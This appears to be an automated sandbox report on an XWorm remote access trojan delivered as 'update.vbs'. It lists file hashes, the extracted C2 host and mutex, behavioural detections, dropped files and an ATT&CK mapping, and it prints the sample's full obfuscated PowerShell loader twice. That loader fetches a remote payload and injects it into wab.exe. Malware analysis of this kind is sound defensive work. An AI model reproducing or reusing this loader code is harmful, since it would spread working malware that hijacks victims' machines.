xworm | b7e3ed8add4ed1f4d78dd45fd97486240585c79ebb5f636949d0e2e62f3b6e14

General

Target

update.vbs
Size

896KB
MD5

5166cecef029d7b9392a1bc345639747
SHA1

abed1e58d8b9633ccab51ddd5c18994cc8183bc8
SHA256

b7e3ed8add4ed1f4d78dd45fd97486240585c79ebb5f636949d0e2e62f3b6e14
SHA512

a07a6c9978f1c0f143413073440763d8f144aa645568b7a82811d398fa089427135238beca0a6d410ce11720c4b12bd594284644a5a7b44c0601ef5a2a5b1488
SSDEEP

12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp9dU:UXh+k+taGKqoJOdU

Score

10^/10

xworm rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

xgmn934.duckdns.org:8896

Mutex

2utLZrxcByvppTdF

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2028-91-0x0000000000CF0000-0x0000000000CFE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

5 2548 powershell.exe
7 2548 powershell.exe
9 2548 powershell.exe
11 2548 powershell.exe
13 2548 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2028 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1576 powershell.exe
2028 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1576 set thread context of 2028 1576 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2548 powershell.exe
1576 powershell.exe
1576 powershell.exe
2028 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1576 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2548 powershell.exe
Token: SeDebugPrivilege 1576 powershell.exe
Token: SeDebugPrivilege 2028 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

2028 wab.exe

flow	pid	process
5	2548	powershell.exe
7	2548	powershell.exe
9	2548	powershell.exe
11	2548	powershell.exe
13	2548	powershell.exe

pid	process
2028	wab.exe

pid	process
1576	powershell.exe
2028	wab.exe

description	pid	process	target process
PID 1576 set thread context of 2028	1576	powershell.exe	wab.exe

pid	process
2548	powershell.exe
1576	powershell.exe
1576	powershell.exe
2028	wab.exe

pid	process
1576	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	2028	wab.exe

pid	process
2028	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1524 wrote to memory of 2548	1524	WScript.exe	powershell.exe
PID 1524 wrote to memory of 2548	1524	WScript.exe	powershell.exe
PID 1524 wrote to memory of 2548	1524	WScript.exe	powershell.exe
PID 2548 wrote to memory of 2648	2548	powershell.exe	cmd.exe
PID 2548 wrote to memory of 2648	2548	powershell.exe	cmd.exe
PID 2548 wrote to memory of 2648	2548	powershell.exe	cmd.exe
PID 2548 wrote to memory of 1576	2548	powershell.exe	powershell.exe
PID 2548 wrote to memory of 1576	2548	powershell.exe	powershell.exe
PID 2548 wrote to memory of 1576	2548	powershell.exe	powershell.exe
PID 2548 wrote to memory of 1576	2548	powershell.exe	powershell.exe
PID 1576 wrote to memory of 2856	1576	powershell.exe	cmd.exe
PID 1576 wrote to memory of 2856	1576	powershell.exe	cmd.exe
PID 1576 wrote to memory of 2856	1576	powershell.exe	cmd.exe
PID 1576 wrote to memory of 2856	1576	powershell.exe	cmd.exe
PID 1576 wrote to memory of 2028	1576	powershell.exe	wab.exe
PID 1576 wrote to memory of 2028	1576	powershell.exe	wab.exe
PID 1576 wrote to memory of 2028	1576	powershell.exe	wab.exe
PID 1576 wrote to memory of 2028	1576	powershell.exe	wab.exe
PID 1576 wrote to memory of 2028	1576	powershell.exe	wab.exe
PID 1576 wrote to memory of 2028	1576	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\update.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Flaccid = 1;$Santalales='Sub';$Santalales+='strin';$Santalales+='g';Function Semiflexion($Telefoniens){$Vespertine=$Telefoniens.Length-$Flaccid;For($fosterer=5;$fosterer -lt $Vespertine;$fosterer+=6){$Smudslitteraturs+=$Telefoniens.$Santalales.Invoke( $fosterer, $Flaccid);}$Smudslitteraturs;}function Underlydsflyets($Lao){. ($Licentiatgradernes) ($Lao);}$Vastities=Semiflexion ' ,imbMDertioPre dzBolvribuybalLimo,lUnvapaPhilo/Nonso5Smals.Forld0ga.lt Forfr( Fo.kW BrddiTyskfnVaccidakkvio.fskewAf,lasHy.ek AfbrkNSemirTFusco t,nde1 Tj,n0Rets .Nevad0Triss;progr EndazWCensoiSpgern Fe r6Uterl4Ut ke; Bevi UnsplxSlave6Ov.re4Pinol;Overr Acenr Ul.rvArbit:Unrot1R.tsf2uhr,i1K,der.Ag.ra0Colpo)Alk l DyrskGTvan eProffcMiscokLykkeo Dagl/ Gran2F,dno0 Skri1 Fals0Mohi 0ansg,1 kl.r0Nyans1Cuta, roed FP,rapi SperrSyst,e aphafStriboOv rax Haze/Nehil1 Cist2 Fors1Polit.Motio0Outea ';$Blenders=Semiflexion 'FredsUOt.cosPresee orrdrGerma-navleAUproogP,sole SammnLeylatIm,re ';$Fjernsyn=Semiflexion 'Mandsh Apprt UdkotSkrifp rgotsForsg: Prec/Virk,/Seam,wTsuchw ByrawSuper.Ebulls Se.ieUnretnBudcedRamadsNondep U.tiaGarvecF,ikaeObtru.Starcc erejo OvermNonpr/gl,ciphydr.rGarceo Stut/Ti.dedKoncelElekt/Opsti3 Tv,faTrim.9ArealxSavlejPtery1 G.ng ';$blokbogstaverne=Semiflexion 'Geocr>Dr,je ';$Licentiatgradernes=Semiflexion 'Pilimi .artem,llixSic l ';$Unsmiled='Opslagsvrkerne';$Besodden = Semiflexion 'Afskye AlogcInelih latioIne p Betin%Olmfua Gud,pnonc,pIn bid Litoa Prott FletaIndsk%Ximen\ olymGEtvrea SubtlAnklagExposeScrapn Cont1Gia t6Forud5Sland. ,ornKRealin forei .ell K,ops&Ganoc& Spaq JerikeAut,mcTungehLaantoDeesk Ars.t H ml ';Underlydsflyets (Semiflexion ',isse$blomkgMaanel Ur.doMedarbOverlaMu tilAzobe:LanarD Prinu Aueta Venil,ishaaWinge=Elli,(C.rboc GamomLowrad eocl Ele t/ PickcKotwa Udsmi$.ruppBmaaleeClavisAalano oveddBetakd Acr.eMinern Svin)Provo ');Underlydsflyets (Semiflexion ' Upgr$T ivlgLi,ocl Plato tribbBesina No.slMarsk:Non.lMCompueentertHjernaSide.dInferoUnco,n Pla.b Unmoe T,reh Udhua TeasnAutoxdMagislSamoriTriconAlf,dg,eran= Gaze$AlkalFMagnejDigtnePolakrGenern DepusKhu kyNedlanI,bre.Subdasa.aphpNonprlsammeiv nhet,olig(Pr in$Hom,db DommlAntihoHom bkValgdb MaltoAethegProlisSli gttumoraY,cksv Ud pestorkr FarvnTrileeFin,v)Wrest ');$Fjernsyn=$Metadonbehandling[0];$Toiletspejles= (Semiflexion 'Tooth$ Skoeg Retsl Mesooha bnb AalhaPrustl roug:Elefat G.iqiStenbtNatiorKrysge QuilrFor.aasirplnR visnRevolaJeesmlA.tenyTrffes Zoope.hapsrOverp=Lans,N Kri.eLitt.wHvoro-ByggeOTouribInterj Ha,sePapirc f,gotoscar Pan,SProfayAftrdssuti,tUnjaueSammem Aron.Ret aNBleedeRentetB gca.IgangWLidiseBish bImplaCOpti lEndosiReclae Taxin De,at');$Toiletspejles+=$Duala[1];Underlydsflyets ($Toiletspejles);Underlydsflyets (Semiflexion ' arag$Befstt dommiS,ciatSmederStopheDisvorDownlaVo.epnTrekanRigoraInterlEn ety Diffs Un eeSl.vir N,il.ParalHSalpieselekaMod.rdAconieForrarRyttes Lykk[Genet$Deo.yBHyraxlFr.nte Silvnb edydOmkl e Brokr.ngansKoola]Ex.um=Guddo$UdskrV Ch eaInexpsPolyst.enotiIndf t ClitiIn.oge DescsRattl ');$Amatrarkologers=Semiflexion ' Un,a$LyknstSkewni vel.tTeachr,ramme,ibekrCher,aHolomn Palan,nsupaTriollUn,enySome sUltraemalnorU,mov.Unde,DSlappoSkor.wRamusnHea slKakemoDep ca ,arad RegnFIndfriImpetlRdg.neEf,er(Skalp$GilbeF Lderj MarteCarairOpr.gnMultisCharmyRadionStruk,Gudhe$ F,itEPrusspHetera.nsecl Lan.pRejseaLgneht Aksge.alav)myofi ';$Epalpate=$Duala[0];Underlydsflyets (Semiflexion 'Karto$,ncepgKa.iulHvileoafkorbAq,edaBeautl hori:VirkeDS apeiEnstav PassiGlatinCivilaPrecob,ageslSchmee.ilic= Radi(pythoThirdse Komps GangtIld,l- OzonPSchisaRaasttJubilhOutec kinn$ SkrlEIn.erpTaxwiaPersol C.enpFrontaMisprtDisbeeJunke)Sem t ');while (!$Divinable) {Underlydsflyets (Semiflexion '.atri$SubergTurnslSpalto KonfbOpistaUnderlDisob:WooleOWhacksRingdt.endee Irren TaagsbisinoProparSvejfiGudetaDkvi.=Engra$ LytttLipidr GraduGum,tePalad ') ;Underlydsflyets $Amatrarkologers;Underlydsflyets (Semiflexion 'UdvlgSB viltcheesaKooter iott.hidd-Kon iS tch.lUnreveTr,eneGironpUninf Tross4Lvovp ');Underlydsflyets (Semiflexion ' Bnds$ParapgFejeklRdha.oCanepbisobaaVerdelChefk: ref,DGangbiExcerv alibi She.n Salma.halebdeadwl ImmaeUnsu,= Bes (RotalT,inameBegaasTrykltRealt-PickePNooklaPrototVaccih .xer Costa$ .alvEC.ntepBas.sa UdgilUncyppKilogaSkattt Downe Unma) Rot, ') ;Underlydsflyets (Semiflexion ',ilsk$R.ntgg Sco.lMundioBenhibN.vlea WurzlRinge: sub.NAllieoUndignB stugHus reYannonAtomfe Chuca PauslForgyoBjrgngRhigoiHep.acEugenaO,fenl Vaar=cyt,t$Rea,tgSaloolAgg eo ncilbPyrogaTitallNajes: DiftL onkrnHeinrgHaan s Sta,eOutsplOntogsIgangfCystouHenfalSangedMandueMilte+Relly+Unmis%S,raf$WickeMSt,deeLowlytMacroaTele,dSi skoShoven Bobeb.runheLevenh.mblya eptnIn uld Al hlRavjyiTrustnRecepgUnpar.HerlicMaitroculliuRacemn GenetRes,n ') ;$Fjernsyn=$Metadonbehandling[$Nongenealogical];}$Groenlandske11=324564;$Kapellaners=29919;Underlydsflyets (Semiflexion 'monro$jarfug An,ilQuizzoHygg b Hov,aIn.rtlNatte:PerceVtel voMe,lomAdvano Whits Refur stud jeppe=Chemi R.cisGSardieBefu.t Dvrg-SkelsCG hngolgesrnAfbart,achye AnstnSlagnt .ras Theo$ omeE StvnpC.ntraLrksgl DefepStiftaArchatAfslaeTuber ');Underlydsflyets (Semiflexion ' Bopl$ddsrigdiaphlCurteo SkaabMotoga.allol,fnde:RecreTDesinePudent atabrMalloahusn,pPottey PelsrO,svbetvan n SjokoOpbe,uRaadgsJumpe msla=Alipi Uddi[poll,SFarfaySynkrs.iloptDestaeNonremDds.t.genneC brawohelminSultev Pn.ue Diffr.orget Tu t]Super:Deve :UltimFSmergrmas.lo Overm K.nnBTrakwaPlan,sTran.epuc,l6H.bac4He.arSInvestVebogrIncori Ild.nCognagLakf.( upma$,etorVUgl,ro be,umBeb.goVortisCatchr nong)Fris, ');Underlydsflyets (Semiflexion 'Ps.ud$EbeltgNetadlSu,laoZygotbKo staCom,elM,rta: .onaLUdmateUndipp W,ofiD beldSpecioFiv,rlHeldaiRdarvt Jvi.eYelp for,l=Withs Welco[Ko diS,tormy Misas,ubbitTjreneT leomParli.SekonTPe,mueFotokxSecultFilms.SkokrE Reinn Pr,acunseaon maudSvmmeiColoqnHarpug Pala],oral:Sunna:He koARefunSKanapCAmbi,ITilsmIOb,en.TraguGsub oeAktivtFun aSDiamatN.ncorIll,siMaikanBarbzgTripe(Unsub$RespaTSo keeMultit.uperrUngenaRtesup ordeyUdsp rRe uce GloonEl,eno .akeu,fbudsKram )Gen,e ');Underlydsflyets (Semiflexion ' Tech$succog yperltautooDistibF.evaaSprudlPillm: AleeSDi,kmaBro hmEnc,mtSttysa Cou.l Bek e g skdNesose un,r=,thal$Fj rnLNuanceMonotp Tilhi PuhsdmedleoBanedl ProgiMarketHa,vle Afbl.KoketsGlocku pseubHobblsUnge,tBl.zorFarmhispi,nnCar igInter(Defle$praliG UkrurinforoDeckheIrvinn Aphtl Re iaPollonMa trdCap.cs OutvkDoloueShrin1C.vil1Tinkt,Dynev$Dor,mKPhonoa EthipHa,sleS,ydelOverclStrata AsthnNiveae ldrer Drais teno)Skrd. ');Underlydsflyets $Samtalede;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Galgen165.Kni && echo t"
3⤵
PID:2648

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Flaccid = 1;$Santalales='Sub';$Santalales+='strin';$Santalales+='g';Function Semiflexion($Telefoniens){$Vespertine=$Telefoniens.Length-$Flaccid;For($fosterer=5;$fosterer -lt $Vespertine;$fosterer+=6){$Smudslitteraturs+=$Telefoniens.$Santalales.Invoke( $fosterer, $Flaccid);}$Smudslitteraturs;}function Underlydsflyets($Lao){. ($Licentiatgradernes) ($Lao);}$Vastities=Semiflexion ' ,imbMDertioPre dzBolvribuybalLimo,lUnvapaPhilo/Nonso5Smals.Forld0ga.lt Forfr( Fo.kW BrddiTyskfnVaccidakkvio.fskewAf,lasHy.ek AfbrkNSemirTFusco t,nde1 Tj,n0Rets .Nevad0Triss;progr EndazWCensoiSpgern Fe r6Uterl4Ut ke; Bevi UnsplxSlave6Ov.re4Pinol;Overr Acenr Ul.rvArbit:Unrot1R.tsf2uhr,i1K,der.Ag.ra0Colpo)Alk l DyrskGTvan eProffcMiscokLykkeo Dagl/ Gran2F,dno0 Skri1 Fals0Mohi 0ansg,1 kl.r0Nyans1Cuta, roed FP,rapi SperrSyst,e aphafStriboOv rax Haze/Nehil1 Cist2 Fors1Polit.Motio0Outea ';$Blenders=Semiflexion 'FredsUOt.cosPresee orrdrGerma-navleAUproogP,sole SammnLeylatIm,re ';$Fjernsyn=Semiflexion 'Mandsh Apprt UdkotSkrifp rgotsForsg: Prec/Virk,/Seam,wTsuchw ByrawSuper.Ebulls Se.ieUnretnBudcedRamadsNondep U.tiaGarvecF,ikaeObtru.Starcc erejo OvermNonpr/gl,ciphydr.rGarceo Stut/Ti.dedKoncelElekt/Opsti3 Tv,faTrim.9ArealxSavlejPtery1 G.ng ';$blokbogstaverne=Semiflexion 'Geocr>Dr,je ';$Licentiatgradernes=Semiflexion 'Pilimi .artem,llixSic l ';$Unsmiled='Opslagsvrkerne';$Besodden = Semiflexion 'Afskye AlogcInelih latioIne p Betin%Olmfua Gud,pnonc,pIn bid Litoa Prott FletaIndsk%Ximen\ olymGEtvrea SubtlAnklagExposeScrapn Cont1Gia t6Forud5Sland. ,ornKRealin forei .ell K,ops&Ganoc& Spaq JerikeAut,mcTungehLaantoDeesk Ars.t H ml ';Underlydsflyets (Semiflexion ',isse$blomkgMaanel Ur.doMedarbOverlaMu tilAzobe:LanarD Prinu Aueta Venil,ishaaWinge=Elli,(C.rboc GamomLowrad eocl Ele t/ PickcKotwa Udsmi$.ruppBmaaleeClavisAalano oveddBetakd Acr.eMinern Svin)Provo ');Underlydsflyets (Semiflexion ' Upgr$T ivlgLi,ocl Plato tribbBesina No.slMarsk:Non.lMCompueentertHjernaSide.dInferoUnco,n Pla.b Unmoe T,reh Udhua TeasnAutoxdMagislSamoriTriconAlf,dg,eran= Gaze$AlkalFMagnejDigtnePolakrGenern DepusKhu kyNedlanI,bre.Subdasa.aphpNonprlsammeiv nhet,olig(Pr in$Hom,db DommlAntihoHom bkValgdb MaltoAethegProlisSli gttumoraY,cksv Ud pestorkr FarvnTrileeFin,v)Wrest ');$Fjernsyn=$Metadonbehandling[0];$Toiletspejles= (Semiflexion 'Tooth$ Skoeg Retsl Mesooha bnb AalhaPrustl roug:Elefat G.iqiStenbtNatiorKrysge QuilrFor.aasirplnR visnRevolaJeesmlA.tenyTrffes Zoope.hapsrOverp=Lans,N Kri.eLitt.wHvoro-ByggeOTouribInterj Ha,sePapirc f,gotoscar Pan,SProfayAftrdssuti,tUnjaueSammem Aron.Ret aNBleedeRentetB gca.IgangWLidiseBish bImplaCOpti lEndosiReclae Taxin De,at');$Toiletspejles+=$Duala[1];Underlydsflyets ($Toiletspejles);Underlydsflyets (Semiflexion ' arag$Befstt dommiS,ciatSmederStopheDisvorDownlaVo.epnTrekanRigoraInterlEn ety Diffs Un eeSl.vir N,il.ParalHSalpieselekaMod.rdAconieForrarRyttes Lykk[Genet$Deo.yBHyraxlFr.nte Silvnb edydOmkl e Brokr.ngansKoola]Ex.um=Guddo$UdskrV Ch eaInexpsPolyst.enotiIndf t ClitiIn.oge DescsRattl ');$Amatrarkologers=Semiflexion ' Un,a$LyknstSkewni vel.tTeachr,ramme,ibekrCher,aHolomn Palan,nsupaTriollUn,enySome sUltraemalnorU,mov.Unde,DSlappoSkor.wRamusnHea slKakemoDep ca ,arad RegnFIndfriImpetlRdg.neEf,er(Skalp$GilbeF Lderj MarteCarairOpr.gnMultisCharmyRadionStruk,Gudhe$ F,itEPrusspHetera.nsecl Lan.pRejseaLgneht Aksge.alav)myofi ';$Epalpate=$Duala[0];Underlydsflyets (Semiflexion 'Karto$,ncepgKa.iulHvileoafkorbAq,edaBeautl hori:VirkeDS apeiEnstav PassiGlatinCivilaPrecob,ageslSchmee.ilic= Radi(pythoThirdse Komps GangtIld,l- OzonPSchisaRaasttJubilhOutec kinn$ SkrlEIn.erpTaxwiaPersol C.enpFrontaMisprtDisbeeJunke)Sem t ');while (!$Divinable) {Underlydsflyets (Semiflexion '.atri$SubergTurnslSpalto KonfbOpistaUnderlDisob:WooleOWhacksRingdt.endee Irren TaagsbisinoProparSvejfiGudetaDkvi.=Engra$ LytttLipidr GraduGum,tePalad ') ;Underlydsflyets $Amatrarkologers;Underlydsflyets (Semiflexion 'UdvlgSB viltcheesaKooter iott.hidd-Kon iS tch.lUnreveTr,eneGironpUninf Tross4Lvovp ');Underlydsflyets (Semiflexion ' Bnds$ParapgFejeklRdha.oCanepbisobaaVerdelChefk: ref,DGangbiExcerv alibi She.n Salma.halebdeadwl ImmaeUnsu,= Bes (RotalT,inameBegaasTrykltRealt-PickePNooklaPrototVaccih .xer Costa$ .alvEC.ntepBas.sa UdgilUncyppKilogaSkattt Downe Unma) Rot, ') ;Underlydsflyets (Semiflexion ',ilsk$R.ntgg Sco.lMundioBenhibN.vlea WurzlRinge: sub.NAllieoUndignB stugHus reYannonAtomfe Chuca PauslForgyoBjrgngRhigoiHep.acEugenaO,fenl Vaar=cyt,t$Rea,tgSaloolAgg eo ncilbPyrogaTitallNajes: DiftL onkrnHeinrgHaan s Sta,eOutsplOntogsIgangfCystouHenfalSangedMandueMilte+Relly+Unmis%S,raf$WickeMSt,deeLowlytMacroaTele,dSi skoShoven Bobeb.runheLevenh.mblya eptnIn uld Al hlRavjyiTrustnRecepgUnpar.HerlicMaitroculliuRacemn GenetRes,n ') ;$Fjernsyn=$Metadonbehandling[$Nongenealogical];}$Groenlandske11=324564;$Kapellaners=29919;Underlydsflyets (Semiflexion 'monro$jarfug An,ilQuizzoHygg b Hov,aIn.rtlNatte:PerceVtel voMe,lomAdvano Whits Refur stud jeppe=Chemi R.cisGSardieBefu.t Dvrg-SkelsCG hngolgesrnAfbart,achye AnstnSlagnt .ras Theo$ omeE StvnpC.ntraLrksgl DefepStiftaArchatAfslaeTuber ');Underlydsflyets (Semiflexion ' Bopl$ddsrigdiaphlCurteo SkaabMotoga.allol,fnde:RecreTDesinePudent atabrMalloahusn,pPottey PelsrO,svbetvan n SjokoOpbe,uRaadgsJumpe msla=Alipi Uddi[poll,SFarfaySynkrs.iloptDestaeNonremDds.t.genneC brawohelminSultev Pn.ue Diffr.orget Tu t]Super:Deve :UltimFSmergrmas.lo Overm K.nnBTrakwaPlan,sTran.epuc,l6H.bac4He.arSInvestVebogrIncori Ild.nCognagLakf.( upma$,etorVUgl,ro be,umBeb.goVortisCatchr nong)Fris, ');Underlydsflyets (Semiflexion 'Ps.ud$EbeltgNetadlSu,laoZygotbKo staCom,elM,rta: .onaLUdmateUndipp W,ofiD beldSpecioFiv,rlHeldaiRdarvt Jvi.eYelp for,l=Withs Welco[Ko diS,tormy Misas,ubbitTjreneT leomParli.SekonTPe,mueFotokxSecultFilms.SkokrE Reinn Pr,acunseaon maudSvmmeiColoqnHarpug Pala],oral:Sunna:He koARefunSKanapCAmbi,ITilsmIOb,en.TraguGsub oeAktivtFun aSDiamatN.ncorIll,siMaikanBarbzgTripe(Unsub$RespaTSo keeMultit.uperrUngenaRtesup ordeyUdsp rRe uce GloonEl,eno .akeu,fbudsKram )Gen,e ');Underlydsflyets (Semiflexion ' Tech$succog yperltautooDistibF.evaaSprudlPillm: AleeSDi,kmaBro hmEnc,mtSttysa Cou.l Bek e g skdNesose un,r=,thal$Fj rnLNuanceMonotp Tilhi PuhsdmedleoBanedl ProgiMarketHa,vle Afbl.KoketsGlocku pseubHobblsUnge,tBl.zorFarmhispi,nnCar igInter(Defle$praliG UkrurinforoDeckheIrvinn Aphtl Re iaPollonMa trdCap.cs OutvkDoloueShrin1C.vil1Tinkt,Dynev$Dor,mKPhonoa EthipHa,sleS,ydelOverclStrata AsthnNiveae ldrer Drais teno)Skrd. ');Underlydsflyets $Samtalede;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Galgen165.Kni && echo t"
4⤵
PID:2856

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2028

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
a02de63fd15ab2d9e78d8a76c028e3f9

SHA1
5762efe3705187d39f934e420a943e0b58f6f095

SHA256
f857f2922496f0d7cf6b61d3d8a55c7428a349cf3c780c1f7e3a3e0ab47a3c0f

SHA512
d6c81e8e633c544069341dff302fd70cc6ce7b1f690f00398c99174f0b7d9d79efdc86ea76adc5653de9dbfc2e583860520b13c55c96cb6f081d1fbaa0ffbb4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar9DDC.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Galgen165.Kni
Filesize
461KB

MD5
e79b05a84404e4211ead4b26ce7b4817

SHA1
f863917c2638ee1f6764346e1d44c7b4bf093e7e

SHA256
0cc9ec208c0bc0870bc99bc36f5130b3c31228438ef9df91f88b26008d56c1ff

SHA512
c9d1d5b2c546fc5285a59aab759ec70050ecb58fedb94dd494c9eae3384f6e53eb495608a961ce8f79f74c10d35fe9e5dad5ca35e16ae4764fc18f797df955a3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OGTCYMOEL84BDI4BQ4IH.temp
Filesize
7KB

MD5
7807ce08a7bce461abde5e3eff1beccc

SHA1
6ca4d1088e9f6ae4839108185bb443b10764e4ae

SHA256
5f95f7bb947597cd37a28b9480f6a43c84afce2357dd7ba5a0b868119a2ac208

SHA512
b6d84b11ffa6e0a5115fbaf21198fa3660168a60202803cd102b910dc4179e50ced73c199f9b8779dd4766d0f4d2e2ee0b51c90321a24bfa9a2deb029447cfde

Download Submit
memory/1576-61-0x0000000006110000-0x0000000008F3C000-memory.dmp

Filesize
46.2MB

Download
memory/2028-91-0x0000000000CF0000-0x0000000000CFE000-memory.dmp

Filesize
56KB

Download
memory/2028-89-0x0000000000CF0000-0x0000000001D52000-memory.dmp

Filesize
16.4MB

Download
memory/2548-8-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-11-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-10-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-9-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-58-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-59-0x000007FEF603E000-0x000007FEF603F000-memory.dmp

Filesize
4KB

Download
memory/2548-4-0x000007FEF603E000-0x000007FEF603F000-memory.dmp

Filesize
4KB

Download
memory/2548-7-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-6-0x00000000024D0000-0x00000000024D8000-memory.dmp

Filesize
32KB

Download
memory/2548-90-0x000007FEF5D80000-0x000007FEF671D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-5-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing